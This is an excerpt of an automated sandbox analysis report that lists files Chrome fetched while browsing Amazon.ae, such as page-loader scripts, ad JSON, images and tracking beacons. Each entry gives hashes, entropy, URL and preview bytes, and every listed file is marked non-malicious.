                                                                                                                                                                                                                                                                      Preview:(function(d){var g=window.AmazonUIPageJS||window.P,q=g._namespace||g.attributeErrors,f=q?q("AmazonRushAssetLoader","AmazonRush"):g;f.guardFatal?f.guardFatal(d)(f,window):f.execute(function(){d(f,window)})})(function(d,g,q){function f(a){l&&l.count&&l.count(a,(l.count(a)||0)+1)}function m(a){return[].concat(null!==a&&void 0!==a?a:[])}function r(a,c,b){a.addEventListener?a.addEventListener("error",c,!1):a.attachEvent&&a.attachEvent("onerror",c);a.addEventListener?a.addEventListener("load",b,!1):a.attachEvent&&.a.attachEvent("onload",b)}function x(a,c,b,h,e,d){if(a){a=document.createElement("script");r(a,e,d);if(c)a.textContent=b;else{a.async=!0;if(e=h)e=-1!==b.indexOf("images/I")||/AUIClients/.test(b);e&&a.setAttribute("crossorigin","anonymous");a.src=b}b=a}else c?(c=document.createElement("style"),r(c,e,d),c.textContent=b,b=c):(c=document.createElement("link"),r(c,e,d),c.rel="stylesheet",c.href=b,b=c);(e=document.getElementsByTagName("head")[0])&&e.appendChild(b)}function k(a,c,b){retur
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (28820), with no line terminators
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):28820
                                                                                                                                                                                                                                                                      Entropy (8bit):5.4222028877426
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:6Fp0LnYjreDpY9mYZ9tSqb/3PtQv2BDyu5m6O9yRcKyuimJyRPrg3dF:4reDpYQi531ouNRqu+Rjg3dF
                                                                                                                                                                                                                                                                      MD5:4EA391E9F4BA73C3AEC92A524AF32573
                                                                                                                                                                                                                                                                      SHA1:47E1EED7211D5A523C61565213B14DBBB5E18588
                                                                                                                                                                                                                                                                      SHA-256:D29CD8DB1B123247F23E416675090EDDC0CEDD75FF95BAE35C226619E5896ED0
                                                                                                                                                                                                                                                                      SHA-512:BCA791D74E2C2C09A0E360103E04AAA19650FE2324813B192F309A126028622597C25E01E18142DBE03613023A3DDCD39D74EDF072E71F275BDDCCA50B662242
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://d1lxz4vuik53pc.cloudfront.net/ih/1722546148000/inner-host.min.js
                                                                                                                                                                                                                                                                      Preview:"use strict";var _typeof="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e};!function(n){var r={};function i(e){if(r[e])return r[e].exports;var t=r[e]={i:e,l:!1,exports:{}};return n[e].call(t.exports,t,t.exports,i),t.l=!0,t.exports}i.m=n,i.c=r,i.d=function(e,t,n){i.o(e,t)||Object.defineProperty(e,t,{configurable:!1,enumerable:!0,get:n})},i.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return i.d(t,"a",t),t},i.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},i.p="",i(i.s=21)}([function(e,t,n){function r(e){var t="adplacements:";return t+=Object(a.y)(),"string"==typeof e&&""!==e&&(t+=":"+e),t}function i(e,t){var n=r(e);Object(o.b)().countMetric(n,t)}var a=n(1),o=n(2),c=n(7),u=n(5);t.b=i;t.c=function(){return Object(o.b)().geom()};t.d=function(){return Object(o.b)().inViewPercentage()
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):5251
                                                                                                                                                                                                                                                                      Entropy (8bit):4.007103797896673
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:ZwBG7haF0FNhMii6Tgmmy9pei44Y9yVXVq73hPpvbdwMGCQPFdMBRlF+2uC:mG7AF0xZTgtyYi4Skhxvbd1GoBPf
                                                                                                                                                                                                                                                                      MD5:A11C57EF107CE654FE3DFB306612D23F
                                                                                                                                                                                                                                                                      SHA1:24317BC338A8F88AD65C4247AA283DE02A3A36B1
                                                                                                                                                                                                                                                                      SHA-256:4245DF78CB042E5712946A0740D216DD2E923AD6889BCB2BD431F963608A7149
                                                                                                                                                                                                                                                                      SHA-512:8EF22FC98D68198B9C32F42941A5777CBA06219637EF70A8555570C1C7BB3FDD3BD394AEA3FD87D188A2270A267D8E98A79B696185FF3AB32065F62BCB932CA3
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:<svg version="1.1" xmlns="http://www.w3.org/2000/svg" focusable="false" aria-hidden="true" viewBox="0 0 53 15" shape-rendering="geometricPrecision"><path d="M11.933,4.04C11.933,3.896 11.966,3.794 12.027,3.738C12.089,3.681 12.187,3.652 12.323,3.652L13.441,3.652C13.679,3.652 13.825,3.767 13.876,3.994L13.985,4.398C14.296,4.097 14.671,3.859 15.112,3.683C15.552,3.507 16,3.419 16.456,3.419C17.46,3.419 18.256,3.787 18.841,4.523C19.427,5.257 19.72,6.253 19.72,7.506C19.72,8.366 19.575,9.117 19.284,9.759C18.995,10.402 18.601,10.896 18.103,11.243C17.606,11.591 17.036,11.764 16.394,11.764C15.968,11.764 15.565,11.697 15.181,11.562C14.798,11.427 14.472,11.241 14.202,11.003L14.202,14.406C14.202,14.55 14.173,14.652 14.118,14.708C14.06,14.765 13.959,14.794 13.814,14.794L12.323,14.794C12.187,14.794 12.089,14.765 12.027,14.708C11.966,14.652 11.933,14.55 11.933,14.406L11.933,4.04ZM48.66,8.345C48.069,8.345 47.557,8.289 47.122,8.174C47.184,8.869 47.393,9.365 47.751,9.666C48.108,9.967 48.649,10.117 49.375,10
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, progressive, precision 8, 3000x1200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):123586
                                                                                                                                                                                                                                                                      Entropy (8bit):7.854887603234212
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3072:48mRMNYwj8SUb5Le2xK3HbkQNZjiBG8c/FRta2wz6:5mqNhPY5RgbTN1iBnKRj
                                                                                                                                                                                                                                                                      MD5:782AEB22C8C1F14307FC2CDF46C600D7
                                                                                                                                                                                                                                                                      SHA1:68BAD28DCA2B48CDDD442F39FC3766F27359B418
                                                                                                                                                                                                                                                                      SHA-256:13BC65C752CEDA5ACE035EFF0679E4E9502123E0378855CAA1A0AD04E511344F
                                                                                                                                                                                                                                                                      SHA-512:21DE5BC1F7B3EC1D97D944BFE604C3963D3EBFF3900E4EC778ACDBDC181B548DF0796548BBB62213A6E940F42C2D89407B623E8101E8A0DF39549D52E91F7990
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 16 x 16
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):1639
                                                                                                                                                                                                                                                                      Entropy (8bit):7.006723249485537
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:aqd6hCTOfaVoAp3p2vxQ1Wwb2h46lgxmR4OV9dFA+9MMy0:Jzo83pwujb2h4nmR4OVXFr9Nl
                                                                                                                                                                                                                                                                      MD5:5552D8845A31BAFBD8854A657E10E434
                                                                                                                                                                                                                                                                      SHA1:24EE24D1E07F067B0A2AE4F6D24238E614BF0B5B
                                                                                                                                                                                                                                                                      SHA-256:98CF6F0429217D92558C4BA49E03C0673ABF69AAACD25AC472A378048B317E05
                                                                                                                                                                                                                                                                      SHA-512:B227E1FECF9051CE7BF19754201504D91FEFE9AE7EB75279EDFEA90A1C2EC6FCB4E96CE258EAA82070DC4FD306E323A2D2C8B324CD231574DC8C0CFB6094958B
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/G/39/javascripts/lib/popover/images/snake._CB485935011_.gif
                                                                                                                                                                                                                                                                      Preview:GIF89a.................................................0...................!.......S.....h..j.....C..........s....8.....O....\............k...........,..........I..X..&........`....4.....d....b..}......?..y..........o............K............{..E........=..w....*............Q.......f..V..T....2..^..;..:....$.....m..M..G..A........6........u..(..Z..q..............!..NETSCAPE2.0.....!.......,...................-o....q40%.....N2mn3K..G....Ol!......a2Y.../..c.+..M/.p$....1.OX.... ."U>..I...O.. ....Jd...3>..+?A,.G..V.H.b@."BL!.H..WF@`...`.....!.......,...............ah=.eR...Hdg28.:4i,..6jQ+....0:..c......NO-....Q......c7......;..........5.kJ...M./.Tb.K......Lk...K1S....,f.<...9....kP3I.G....!.....+.,...............NY`O......".OUX$.&'.V.(_....T[...W^.H.._...)JZ..J\R.Y ...]&.QG...%.!L..P...S*.......Z.......P.....G.K...M.#.I..MK..... .....!.......,............../#!J.@'.....".?(e&....-Q'...IRU6H..,.V..Zi7..f#..Q.a.....+[h'Z....lgC'...mr>H5...\..# ..0-.SVW.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 440x500, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):26857
                                                                                                                                                                                                                                                                      Entropy (8bit):7.9679256349515155
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:157Pe+HUEvNCjXlTdRSwC3SStkLjy7GMi7fO:nGEUEvNC7lTdEwW3bGB2
                                                                                                                                                                                                                                                                      MD5:11460182BE50ADDD467AC2BC31019104
                                                                                                                                                                                                                                                                      SHA1:CA8FE4296865A68CB22D28F6A5C83109B82BF34F
                                                                                                                                                                                                                                                                      SHA-256:5D0625A68A69D183661117C8D96DFCE899EFFE2BEFF30BE6A2B0FD99E630F0E9
                                                                                                                                                                                                                                                                      SHA-512:7BB3AF0D861F444E074131BE0B3DB61EE85E09F4A5B83558E31ABFD799965B2A38842BC7B4A9407AC9531D41155C842BC25685D42BC052D9B4FBBD6BA983B196
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/EN-L2-Outdoor-sports-Football-440x500.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."................................................YZk....E..X.J.t.+{c7.Y]......`k........tU..Y..t....6...MKz......wu...ld.;.x...f.)d..v...9..a..M.6.r9....sw..-t6.V....W.)..$..)P./...:...R5.......6...{M...V.:9.q+.H...[.I.Y..1..&}.}./:..|.........Y..[wRx.T.t:...[z..0f.\..\.....p...p.,..'Gc..m..9..=NvnK.o..".........{p....rF.$MH.4..+U7:...J..6..a....6..Y.`.aeL.}.C7...5&...Iw...s....J.Sindf/NQ..`..'Z....z:v.J.....C%....|\.$......5F..r...}...5....E.lx.#.g>.K..M..X....{Ib.S,z.Iw4..Z.v.A_*5..\g]....Mh.+.k?;.k....9..s.J.[lzI......n,..T.1......^I$.Y..[..6.....Z...].....M..zXy.h{...4.fz.>-..Ml..<...?E...t.=...>.{...:#.;.Q........{..l6.C....Y.%..6ie.....$.g3/.......kung....<.I....[o.....U.o..,.b.........M.^}...l|%....b......c}....FC^..r..W..Y.Y.....n.W.....<........s........oo~..U...=Ud.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:RP6015S40NY7Z1AX6ZEM$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.295509.0%26id%3DRP6015S40NY7Z1AX6ZEM%26sw%3D1280%26sh%3D1024%26vw%3D1263%26vh%3D907%26m%3D1%26sc%3DRP6015S40NY7Z1AX6ZEM%26ue%3D5%26bb%3D874%26ns%3D904%26ne%3D963%26be%3D2741%26fp%3D959%26fcp%3D959%26cf%3D2756%26af%3D3091%26fn%3D3091%26pc%3D12641%26tc%3D-1108%26na_%3D-1108%26ul_%3D-1724264931186%26_ul%3D-1724264931186%26rd_%3D-1724264931186%26_rd%3D-1724264931186%26fe_%3D-1104%26lk_%3D-1056%26_lk%3D-1056%26co_%3D-1056%26_co%3D-319%26sc_%3D-1056%26rq_%3D-318%26rs_%3D-52%26_rs%3D1636%26dl_%3D-32%26di_%3D2860%26de_%3D2860%26_de%3D2861%26_dc%3D12641%26ld_%3D12641%26_ld%3D-1724264931186%26ntd%3D-1%26ty%3D0%26rc%3D0%26hob%3D4%26hoe%3D5%26ld%3D12642%26t%3D1724264943828%26ctb%3D1%26pty%3DSearch%26spty%3DList%26pti%3Dundefined%26tid%3DRP6015S40NY7Z1AX6ZEM%26aftb%3D1%26ui%3D2%26lob%3D1:12650
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):5133
                                                                                                                                                                                                                                                                      Entropy (8bit):5.278177551629622
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:IdNPo5rE8+B/iEbtvFeSDO+aqsAWJty0uqY7b/40STfKAHSTfXA3mL/4qw/pU:IHo5rE8g/iERc+DatftyAkb/4fKAAXAY
                                                                                                                                                                                                                                                                      MD5:3B6A86BB2FD8F908F1770F72C7F19A8B
                                                                                                                                                                                                                                                                      SHA1:17F9375B7BEFD78C1E24FAE9182923FA039BACBE
                                                                                                                                                                                                                                                                      SHA-256:B544FD8ACCB922B6D3AD6247081836238C5A702C768F78529EF41EF92C20279E
                                                                                                                                                                                                                                                                      SHA-512:DBB9ECB15536912FED1B63B97BE4DADC043EF305E1AD60BB9987BB05E04EFAB7408489642A84CEBBF0557DC1631289EF1408722257DD06E7962C9AA87A13A788
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:{"status":"ok","html":"<a data-a-modal=\"{&quot;url&quot;:&quot;/af/feedback-form?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Search_auto-bottom-advertising-0_portal-batch-fast-btf-loom_placement%22%2C%22pageType%22%3A%22Search%22%2C%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlL3MvP19lbmNvZGluZz1VVEY4Jms9dG95cyZjcmlkPTMzRFk4Q1JUS0UwSlcmc3ByZWZpeD10b3klMkNhcHMlMkMyMDQmcmVmPW5iX3NiX25vc3NfMSZwZF9yZF93PXZkS0o3JmNvbnRlbnQtaWQ9YW16bjEuc3ltLjBlMmMzZWViLTBiODktNGY4ZC05NDcwLWJhNTI0MGY3MjkyNiZwZl9yZF9wPTBlMmMzZWViLTBiODktNGY4ZC05NDcwLWJhNTI0MGY3MjkyNiZwZl9yZF9yPUFQQVZDUUpNRks3OFFKRVYxUE1aJnBkX3JkX3dnPXZUaHltJnBkX3JkX3I9ZWI4Mzc5MzItNDhkMC00ZDM1LWI3NDMtYTZiZjYyZjVhODg2JnJlZl89cGRfaHBfZF9hdGZfdW5r%22%2C%22slotName%22%3A%22auto-bottom-advertising-0%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221027%22%2C%22adCreativeId%22%3A%220%22%2C%22adId%22%3A%22300164802756332%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D&daFlg=false&ie=UTF-8&quot
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 180x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):5284
                                                                                                                                                                                                                                                                      Entropy (8bit):7.902264827854326
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:Ty3OJCJ15DrPU2Wz+OT5higqkEve6OnsSjV3AZH/:EOJCfaf+OT56d2VAB
                                                                                                                                                                                                                                                                      MD5:E322DC61003BBE309B369CC924707F76
                                                                                                                                                                                                                                                                      SHA1:B3B8ECD8F9391259962936F6F99C12FD86631DE7
                                                                                                                                                                                                                                                                      SHA-256:2E49F3D78EB605F0E6FCB03EDFD74BACC3527F8A5B9887FBECD8251710FF963A
                                                                                                                                                                                                                                                                      SHA-512:9520AC8885A046AAB4CB5BED9C8AFB6D52D996CFFA7A298641C573EB5B7E922A13A92DC413C6F1F90A1380248FD1F8CF003E75286CEFC616996E80645070453C
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................1..!a."AQ...#2Bq..3Sb...RTc....$s..%r....................................................?..t.(..(..(..( ..w%..C.....(.F(Y.n..H .6I.....t..+...Z.q........c3rn.U..._..1..t..w ...I+..I...~l..&nN.t.H...2.{;.B..g)!.r..C0..{(H.A3.].{.s... .dF...B.2..T...f........@f.@"K.'.L.@9'{l.I..#.....XgI.<l.N|G.....G..JR.JR.JR.JR.JR.JR.JR.JR.JR.\k......u...~*...{..........h*.gWV.....J#...+H.....2...Q...S......D.h-D.^Gc....2.'2=\._.,.....vw..1^s.C..!1.]A.%.sM/h...V.i...M*..,<.9.,C.$fv..0z~.c./z..%.5..>....V..=...bN.;....5m*...RtkK..G.n.k6U...#.9......x.9V.L.....O....&(..#.....h......~..<i..n.^..N.0Y.C$.I.o....bY:.+..b2.."....)U.R..R..>....w..T8&7........4..R..R..R..R..R..R...n..J.g...d...l../........./.\.......c...;.U..r~L+..y...:...Q..+......>AP.9U..1^^.]..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x307, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):30807
                                                                                                                                                                                                                                                                      Entropy (8bit):7.981130497181998
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:E8Wsecjcpj7R401m7Nb/SIZlMmcuF75ni4E7a:ycjS/R4kUToY7ViTu
                                                                                                                                                                                                                                                                      MD5:2592C6F34955797711AC14DFB2754063
                                                                                                                                                                                                                                                                      SHA1:5147BD85B9535EBA94EAB8F6F0ECC21BD0362182
                                                                                                                                                                                                                                                                      SHA-256:03F92EF1583A8E25635353B2FF6B46DD1123525C2B91060999C51712356A3B5B
                                                                                                                                                                                                                                                                      SHA-512:2FE75FC665E917EE3D9FF7821A7625E3AA55E66FB23DBF4B1086BC0DC55EC0C814DE27F4F1201962F1E9FF25B02F77BD6BE6E218FA441421E4924D6DFBF56CDE
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......3.@.."..........6...................................................................t....ts..Q..."JmB$.."JmB$.."Jo.1.......!Q.....3........cf.P..Q6..Sj.%6..Sj.%6..S}G.m.C..f...0...:.).x.1.F..2v.f...l..8.s._.?..z.......l..O....b&....Z;.jI....VnIi...ZG.q..*.>EP..b...=X.U....e..&......!..z.....ar..%<.J^.n...8...-...X..5.c..R\.r.Y...e.yIh.95...VY.SY.Mc...d..Iy../......h.f....aB....U.\?N!..iM......FX....2h.y.....@....=\.o............X9......^.J.Ov...t..-.#..x...o..n....3.....L.D|~x.-.....>.H@...~(......o.!).o...,y...W6..S.9.,_.D.........cLb.6+g<.8~..6{..3.I.>.X...%6I$...$.K..9...Lg.A...L].....&!....~.:.n....rG.../.y..%..4E...(..Z._.c...%N.........,..'.Y....K6}.._..u.au.$.I$.G.g3i...K>.<.d>........n..>.....g..F.VEKd'..o........i....9.M&....fB..?.<K.Y.|.R....\.w....%.._~9j....#M1...wT'.tVr8......fc..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):71
                                                                                                                                                                                                                                                                      Entropy (8bit):4.19644707821733
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                                                                                      MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                                                                                      SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                                                                                      SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                                                                                      SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://www.amazon.ae/rd/uedata?at&v=0.295396.0&id=3YMHCN1ADEMYQEW81YBE&ctb=1&m=1&sc=3YMHCN1ADEMYQEW81YBE&pc=8174&at=8174&t=1724264962210&pty=Landing&spty=BrowsePage&pti=15149894031&tid=3YMHCN1ADEMYQEW81YBE&aftb=1&ui=2&lob=1
                                                                                                                                                                                                                                                                      Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x262, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):8611
                                                                                                                                                                                                                                                                      Entropy (8bit):7.907021721549348
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:1fwSK7UusHMSZTLuDgRfCe3TpUvgdmQ/WiQEgZS/gmeBUM:u7hsHMMZNU+mQ5QlYex
                                                                                                                                                                                                                                                                      MD5:D71B3C6B42156CCAE0389448D5CC360B
                                                                                                                                                                                                                                                                      SHA1:24313B095DE95C87F83E81447EB24DE13A75DD1D
                                                                                                                                                                                                                                                                      SHA-256:924D58824888A2F7B5A299972F8A922D8730C5C9F1607EC9A411B451B18F44FB
                                                                                                                                                                                                                                                                      SHA-512:9239385D49E4E98DFFE504C3FE5107F19C63DD3E09855D4DBB51CD8CA008346567A6E45CB705BAE64A1423982B46112F0511082FBBB07D3792BC5884135C86DC
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/51m-fKwiHIL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........@.."..........4.................................................................,......."...7]...w.=.:....;X@..........Te...h}....]~.lCA..l}.n..r...wl..g...[.'..............S......M4....}Yi.......~w..67....f...........*.+...J..?.U....x...^...._..U..\...n......@........*.....EU.^.4..l.M.^./..[.....P...k......................s.$.C,.odB.Z."v.{.[..bg.Bw..M..I..o............fp..~..he...Fu5enS8.S..h../.c....~h......c..w.........%.....o..X.W.......a.w...>......<.~.J.O..*.......Cz...I...........W..P.......Xp..RG......s..G.6..{..i\.r...6.yS..j.hI.U.4......A...Ttm.{8.#p./3Z....w...k.Y.s...?...z.As8......X..c.;=Z2Z.....u....T..YN..R...2c...{k69?C*..:7.'.|..*[R.......8A..C...A........j..mqn....t...3Z........p..p>..6-..zI`~......b...v..K...n..../tif..h........E.@!..v....I..(N.Y..z....y.t..{=
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 233x320, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):22269
                                                                                                                                                                                                                                                                      Entropy (8bit):7.966452149230955
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:DuFUW5LY+fIqxspk1KT7wF93YQiK7WOX8vIkyBXWKPuYcPUdOws4QRtag4LSeCL3:aLLKg1ckF9IQ5WIkGrWIO7hBn4SYBu
                                                                                                                                                                                                                                                                      MD5:22FC8EF74DCF0C331C8379AAF2EBAF1B
                                                                                                                                                                                                                                                                      SHA1:09C700B70F945C01ACC8A0CB30D9ED32F9EEBC4B
